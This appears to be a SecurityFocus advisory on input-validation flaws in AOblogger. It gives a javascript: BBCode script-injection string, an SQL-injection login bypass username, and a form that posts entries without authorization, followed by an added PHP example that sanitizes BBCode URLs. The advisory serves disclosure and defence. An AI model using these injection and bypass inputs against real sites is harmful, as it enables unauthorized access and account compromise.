AOblogger Multiple Input Validation Vulnerabilities

An exploit is not required.

A BBCode tag script-injection example has been provided:
[url]javascript:alert(123)[/url]
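
One way to close the BBCode case above on the rendering side, as an added example that is not AOblogger's own code: escape the whole post first, then turn a [url] tag into a link only when its target passes a scheme allowlist. The function names `safe_href` and `render_bbcode_urls`, the http/https allowlist and the sample posts are assumptions made for this sketch.

```php
<?php
// Added example, not AOblogger code. Function names are hypothetical.
const ALLOWED_SCHEMES = ['http', 'https']; // assumption: only web links are wanted

function safe_href(string $raw): ?string
{
    // Browsers ignore control characters and whitespace inside a scheme
    // ("java\tscript:"), so strip them before inspecting the URL.
    $url = preg_replace('/[\x00-\x20\x7f]+/', '', $raw);
    $parts = parse_url($url);
    if (!is_array($parts) || empty($parts['host'])) {
        return null; // malformed, relative or host-less
    }
    $scheme = strtolower($parts['scheme'] ?? '');
    return in_array($scheme, ALLOWED_SCHEMES, true) ? $url : null;
}

function render_bbcode_urls(string $text): string
{
    $flags = ENT_QUOTES | ENT_SUBSTITUTE;
    // Escape the whole post first so no user-supplied markup survives.
    $escaped = htmlspecialchars($text, $flags, 'UTF-8');
    return preg_replace_callback(
        '#\[url\](.*?)\[/url\]#is',
        function (array $m) use ($flags): string {
            $href = safe_href(htmlspecialchars_decode($m[1], ENT_QUOTES));
            if ($href === null) {
                return $m[0]; // rejected: leave the tag as inert escaped text
            }
            $attr = htmlspecialchars($href, $flags, 'UTF-8');
            return '<a href="' . $attr . '" rel="nofollow noopener">' . $attr . '</a>';
        },
        $escaped
    );
}

// Constructed sample posts, including the advisory's example.
$samples = [
    '[url]javascript:alert(123)[/url]',
    "[url]JaVa\tScRiPt:alert(123)[/url]",
    '[url]https://www.example.com/?a=1&b="2"[/url]',
];
foreach ($samples as $post) {
    echo render_bbcode_urls($post), PHP_EOL;
}
```

Rejected tags are emitted as escaped text rather than dropped, so a moderator can still see what was submitted.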

An SQL-injection example has been provided:
http://www.example.com/aoblogger/login.php
username: username'/*
password: any

An example of new entry creation without proper authorization has been provided:

<form action="http://www.example.com/aoblogger/create.php" method="post">
<input name="uza" value=1>
<input name="title" value="anytitle">
<textarea name="message">anymessage</textarea>
</form>


 

Copyright 2010, SecurityFocus